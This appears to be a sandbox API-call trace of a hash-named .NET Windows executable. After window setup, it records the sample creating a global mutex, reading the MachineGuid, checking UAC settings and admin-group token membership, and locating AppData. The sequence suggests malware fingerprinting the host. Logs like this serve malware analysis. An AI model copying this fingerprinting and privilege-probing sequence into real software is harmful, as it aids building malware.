[0200.903] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x1, wParam=0x0, lParam=0x19ebe0) returned 0x0
[0200.903] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e8f0 | out: lpRect=0x19e8f0) returned 1
[0200.903] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e8f0 | out: lpRect=0x19e8f0) returned 1
[0200.932] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0200.932] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0200.932] GetSystemMetrics (nIndex=42) returned 0
[0200.933] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673950, nMaxCount=1 | out: lpString="") returned 0
[0200.933] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673950) returned 0x0
[0200.959] GetProcessWindowStation () returned 0xd0
[0200.960] GetUserObjectInformationA (in: hObj=0xd0, nIndex=1, pvInfo=0x247aa38, nLength=0xc, lpnLengthNeeded=0x19e7ec | out: pvInfo=0x247aa38, lpnLengthNeeded=0x19e7ec) returned 1
[0200.960] GetLastError () returned 0x0
[0200.961] SetConsoleCtrlHandler (HandlerRoutine=0x2020b3a, Add=1) returned 1
[0200.961] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.962] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.964] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWndClass=0x247aa80 | out: lpWndClass=0x247aa80) returned 0
[0200.971] CoTaskMemAlloc (cb=0x58) returned 0x661d98
[0200.971] RegisterClassW (lpWndClass=0x673968) returned 0xc150
[0200.971] GetLastError () returned 0x583
[0200.971] CoTaskMemFree (pv=0x661d98)
[0200.972] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWindowName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x4022c
[0200.974] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x81, wParam=0x0, lParam=0x19e260) returned 0x1
[0200.975] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x83, wParam=0x0, lParam=0x19e24c) returned 0x0
[0200.976] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x1, wParam=0x0, lParam=0x19e260) returned 0x0
[0200.976] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0
[0200.976] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0200.976] GetLastError () returned 0x7f
[0201.006] GetStartupInfoW (in: lpStartupInfo=0x247b1d4 | out: lpStartupInfo=0x247b1d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0201.015] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19ebf4) returned 0x0
[0201.015] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x83, wParam=0x1, lParam=0x19ebcc) returned 0x0
[0201.037] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19e974 | out: lpwndpl=0x19e974) returned 1
[0201.039] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19ebf4) returned 0x0
[0201.039] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0201.039] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e3cc | out: lpRect=0x19e3cc) returned 1
[0201.039] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e3cc | out: lpRect=0x19e3cc) returned 1
[0201.040] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.040] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.040] GetSystemMetrics (nIndex=42) returned 0
[0201.040] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673950, nMaxCount=1 | out: lpString="") returned 0
[0201.040] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673950) returned 0x0
[0201.071] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0201.073] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e918 | out: lpRect=0x19e918) returned 1
[0201.073] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e918 | out: lpRect=0x19e918) returned 1
[0201.087] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0
[0201.087] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0
[0201.087] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0
[0201.088] GetLastError () returned 0xb7
[0201.089] GetParent (hWnd=0x4024a) returned 0x0
[0201.091] GetStockObject (i=5) returned 0x1900015
[0201.091] GetLastError () returned 0xb7
[0201.092] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0201.092] CoTaskMemAlloc (cb=0x4c) returned 0x5f23b8
[0201.092] RegisterClassW (lpWndClass=0x673948) returned 0xc1d7
[0201.093] GetLastError () returned 0xb7
[0201.093] CoTaskMemFree (pv=0x5f23b8)
[0201.093] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0201.093] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.378734a", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x801e2
[0201.094] SetWindowLongW (hWnd=0x801e2, nIndex=-4, dwNewLong=1999548128) returned 33688474
[0201.094] GetWindowLongW (hWnd=0x801e2, nIndex=-4) returned 1999548128
[0201.094] SetWindowLongW (hWnd=0x801e2, nIndex=-4, dwNewLong=33688522) returned 1999548128
[0201.095] GetWindowLongW (hWnd=0x801e2, nIndex=-4) returned 33688522
[0201.095] GetWindowLongW (hWnd=0x801e2, nIndex=-16) returned 79691776
[0201.097] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x24, wParam=0x0, lParam=0x19ec14) returned 0x0
[0201.098] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x81, wParam=0x0, lParam=0x19ec08) returned 0x1
[0201.098] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x83, wParam=0x0, lParam=0x19ebf4) returned 0x0
[0201.100] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x1, wParam=0x0, lParam=0x19ec08) returned 0x0
[0201.100] GetLastError () returned 0x0
[0201.101] SetWindowLongW (hWnd=0x4024a, nIndex=-8, dwNewLong=524770) returned 0
[0201.286] GetSystemMetrics (nIndex=11) returned 32
[0201.286] GetLastError () returned 0x0
[0201.286] GetSystemMetrics (nIndex=12) returned 32
[0201.286] GetLastError () returned 0x0
[0201.287] GetDC (hWnd=0x0) returned 0x4010197
[0201.287] GetLastError () returned 0x0
[0201.292] GetDeviceCaps (hdc=0x4010197, index=12) returned 32
[0201.292] GetLastError () returned 0x0
[0201.292] GetDeviceCaps (hdc=0x4010197, index=14) returned 1
[0201.292] GetLastError () returned 0x0
[0201.295] ReleaseDC (hWnd=0x0, hDC=0x4010197) returned 1
[0201.295] GetLastError () returned 0x0
[0201.297] CreateIconFromResourceEx (presbits=0x247df78, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0xd00a9
[0201.298] GetLastError () returned 0x0
[0201.299] GetSystemMetrics (nIndex=49) returned 16
[0201.299] GetSystemMetrics (nIndex=50) returned 16
[0201.300] CreateIconFromResourceEx (presbits=0x247f054, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x901ab
[0201.301] GetLastError () returned 0x0
[0201.303] SendMessageW (hWnd=0x4024a, Msg=0x80, wParam=0x0, lParam=0x901ab) returned 0x0
[0201.303] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x80, wParam=0x0, lParam=0x901ab) returned 0x0
[0201.303] SendMessageW (hWnd=0x4024a, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.303] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.304] GetSystemMenu (hWnd=0x4024a, bRevert=0) returned 0x40273
[0201.335] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19f1f0 | out: lpwndpl=0x19f1f0) returned 1
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf020, uEnable=0x1) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf000, uEnable=0x1) returned 0
[0201.340] SetWindowLongW (hWnd=0x4024a, nIndex=-8, dwNewLong=524770) returned 524770
[0201.344] SendMessageW (hWnd=0x801e2, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.344] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.346] GetWindowLongW (hWnd=0x4024a, nIndex=-16) returned 651100160
[0201.346] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.346] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.346] GetSystemMetrics (nIndex=42) returned 0
[0201.347] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673930, nMaxCount=1 | out: lpString="") returned 0
[0201.347] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673930) returned 0x0
[0201.347] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.347] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.347] GetSystemMetrics (nIndex=42) returned 0
[0201.347] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673930, nMaxCount=1 | out: lpString="") returned 0
[0201.347] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673930) returned 0x0
[0201.347] GetWindowLongW (hWnd=0x4024a, nIndex=-16) returned 651100160
[0201.350] GetWindowLongW (hWnd=0x4024a, nIndex=-20) returned 65792
[0201.356] SetWindowLongW (hWnd=0x4024a, nIndex=-16, dwNewLong=583991296) returned 651100160
[0201.356] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7c, wParam=0xfffffff0, lParam=0x19f164) returned 0x0
[0201.356] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7d, wParam=0xfffffff0, lParam=0x19f164) returned 0x0
[0201.357] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x901ab
[0201.363] SetWindowLongW (hWnd=0x4024a, nIndex=-20, dwNewLong=65536) returned 65792
[0201.363] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7c, wParam=0xffffffec, lParam=0x19f164) returned 0x0
[0201.364] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7d, wParam=0xffffffec, lParam=0x19f164) returned 0x0
[0201.367] SetWindowPos (hWnd=0x4024a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0201.368] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19f19c) returned 0x0
[0201.368] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x83, wParam=0x1, lParam=0x19f174) returned 0x0
[0201.370] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19ef1c | out: lpwndpl=0x19ef1c) returned 1
[0201.370] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19f19c) returned 0x0
[0201.370] GetClientRect (in: hWnd=0x4024a, lpRect=0x19eec0 | out: lpRect=0x19eec0) returned 1
[0201.370] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19eec0 | out: lpRect=0x19eec0) returned 1
[0201.385] RedrawWindow (hWnd=0x4024a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1
[0201.397] GetSystemMenu (hWnd=0x4024a, bRevert=0) returned 0x40273
[0201.397] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19f1d4 | out: lpwndpl=0x19f1d4) returned 1
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf020, uEnable=0x1) returned 1
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf000, uEnable=0x1) returned 1
[0201.398] ShowWindow (hWnd=0x4024a, nCmdShow=2) returned 0
[0201.398] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19f254) returned 0x0
[0201.435] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19efd4 | out: lpwndpl=0x19efd4) returned 1
[0201.435] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19f254) returned 0x0
[0201.435] GetClientRect (in: hWnd=0x4024a, lpRect=0x19ef78 | out: lpRect=0x19ef78) returned 1
[0201.435] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19ef78 | out: lpRect=0x19ef78) returned 1
[0201.464] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.464] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.464] GetSystemMetrics (nIndex=42) returned 0
[0201.464] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673930, nMaxCount=1 | out: lpString="") returned 0
[0201.464] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673930) returned 0x0
[0201.467] SendMessageW (hWnd=0x4024a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0201.474] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0201.492] GetWindowThreadProcessId (in: hWnd=0x4024a, lpdwProcessId=0x19ef34 | out: lpdwProcessId=0x19ef34) returned 0xce0
[0201.492] GetCurrentThreadId () returned 0xce0
[0201.493] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1c5
[0201.494] PostMessageW (hWnd=0x4024a, Msg=0xc1c5, wParam=0x0, lParam=0x0) returned 1
[0201.501] OleInitialize (pvReserved=0x0) returned 0x0
[0201.502] GetLastError () returned 0x6
[0201.502] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x19f348 | out: lplpMessageFilter=0x19f348*=0x0) returned 0x0
[0201.525] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 1
[0201.534] IsWindowUnicode (hWnd=0x4024a) returned 1
[0201.539] GetMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f320) returned 1
[0201.566] TranslateMessage (lpMsg=0x19f320) returned 0
[0201.567] DispatchMessageW (lpMsg=0x19f320) returned 0x0
[0201.567] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0201.568] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 1
[0201.568] IsWindowUnicode (hWnd=0x801e2) returned 1
[0201.568] GetMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f320) returned 1
[0201.569] TranslateMessage (lpMsg=0x19f320) returned 0
[0201.569] DispatchMessageW (lpMsg=0x19f320) returned 0x0
[0201.569] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0201.569] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 1
[0201.569] IsWindowUnicode (hWnd=0x4024a) returned 1
[0201.569] GetMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f320) returned 1
[0201.569] TranslateMessage (lpMsg=0x19f320) returned 0
[0201.569] DispatchMessageW (lpMsg=0x19f320) returned 0x0
[0201.582] GetFocus () returned 0x0
[0201.583] ShowWindow (hWnd=0x4024a, nCmdShow=0) returned 1
[0201.583] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0
[0201.583] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19e9bc) returned 0x0
[0201.587] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19e73c | out: lpwndpl=0x19e73c) returned 1
[0201.587] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19e9bc) returned 0x0
[0201.587] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e6e0 | out: lpRect=0x19e6e0) returned 1
[0201.587] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e6e0 | out: lpRect=0x19e6e0) returned 1
[0201.588] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0201.588] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0201.588] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e720 | out: lpRect=0x19e720) returned 1
[0201.588] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e720 | out: lpRect=0x19e720) returned 1
[0201.600] strncat_s (in: _Destination="System.Collections.Generic", _SizeInBytes=0x29, _Source=".", _MaxCount=0xffffffff | out: _Destination="System.Collections.Generic.") returned 0x0
[0201.629] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x673930, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")) returned 0x62
[0201.629] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19e598, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d
[0201.629] GetLastError () returned 0x0
[0201.630] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d
[0201.630] GetLastError () returned 0x0
[0201.630] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1
[0201.630] GetLastError () returned 0x0
[0201.662] FindResourceExA (hModule=0x0, lpType=0xa, lpName=0x1, wLanguage=0x0) returned 0x422048
[0201.663] LoadResource (hModule=0x0, hResInfo=0x422048) returned 0x422058
[0201.663] SizeofResource (hModule=0x0, hResInfo=0x422048) returned 0x15d20
[0201.664] LockResource (hResData=0x422058) returned 0x422058
[0201.689] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0201.689] GetLastError () returned 0x0
[0202.244] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19e994 | out: pfEnabled=0x19e994) returned 0x0
[0202.596] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19d2c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0202.596] GetLastError () returned 0x0
[0202.657] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19d284, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0202.657] GetLastError () returned 0x0
[0202.724] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="Global\\{9358a53f-433c-42f5-bd3f-14ae4da528cf}") returned 0x2d4
[0202.725] GetLastError () returned 0x0
[0202.730] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19ea6c | out: phkResult=0x19ea6c*=0x2d8) returned 0x0
[0202.731] RegQueryValueExA (in: hKey=0x2d8, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x19ea64, lpData=0x0, lpcbData=0x19ea68*=0x0 | out: lpType=0x19ea64*=0x1, lpData=0x0, lpcbData=0x19ea68*=0x25) returned 0x0
[0202.731] RegQueryValueExA (in: hKey=0x2d8, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x19ea64, lpData=0x673918, lpcbData=0x19ea68*=0x25 | out: lpType=0x19ea64*=0x1, lpData="03845cb8-7441-4a2f-8c0f-c90408af5778", lpcbData=0x19ea68*=0x25) returned 0x0
[0202.732] RegCloseKey (hKey=0x2d8) returned 0x0
[0202.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea14 | out: phkResult=0x19ea14*=0x2d8) returned 0x0
[0202.735] RegQueryValueExW (in: hKey=0x2d8, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x19ea50, lpData=0x0, lpcbData=0x19ea4c*=0x0 | out: lpType=0x19ea50*=0x4, lpData=0x0, lpcbData=0x19ea4c*=0x4) returned 0x0
[0202.736] RegQueryValueExW (in: hKey=0x2d8, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x19ea50, lpData=0x19ea3c, lpcbData=0x19ea4c*=0x4 | out: lpType=0x19ea50*=0x4, lpData=0x19ea3c*=0x1, lpcbData=0x19ea4c*=0x4) returned 0x0
[0202.742] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0202.742] GetLastError () returned 0x0
[0202.743] GetCurrentProcess () returned 0xffffffff
[0202.743] GetLastError () returned 0x3f0
[0202.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e9e0 | out: TokenHandle=0x19e9e0*=0x2dc) returned 1
[0202.744] GetLastError () returned 0x3f0
[0202.746] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19ea38 | out: TokenInformation=0x0, ReturnLength=0x19ea38) returned 0
[0202.746] GetLastError () returned 0x7a
[0202.747] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x685928
[0202.747] GetLastError () returned 0x7a
[0202.747] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x685928, TokenInformationLength=0x4, ReturnLength=0x19ea38 | out: TokenInformation=0x685928, ReturnLength=0x19ea38) returned 1
[0202.747] GetLastError () returned 0x7a
[0202.749] DuplicateTokenEx (in: hExistingToken=0x2dc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x19e9f0 | out: phNewToken=0x19e9f0*=0x2e0) returned 1
[0202.749] GetLastError () returned 0x7f
[0202.750] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19ea38 | out: TokenInformation=0x0, ReturnLength=0x19ea38) returned 0
[0202.750] GetLastError () returned 0x7a
[0202.750] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x685a98
[0202.750] GetLastError () returned 0x7a
[0202.750] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x685a98, TokenInformationLength=0x4, ReturnLength=0x19ea38 | out: TokenInformation=0x685a98, ReturnLength=0x19ea38) returned 1
[0202.750] GetLastError () returned 0x7a
[0202.755] CheckTokenMembership (in: TokenHandle=0x2e0, SidToCheck=0x24aa43c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19e9cc | out: IsMember=0x19e9cc) returned 1
[0202.755] GetLastError () returned 0x7a
[0202.755] CloseHandle (hObject=0x2e0) returned 1
[0202.755] GetLastError () returned 0x7a
[0202.756] GetCurrentProcess () returned 0xffffffff
[0202.781] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x673930 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0
[0202.782] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19e524, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25
[0202.782] GetLastError () returned 0x3f0
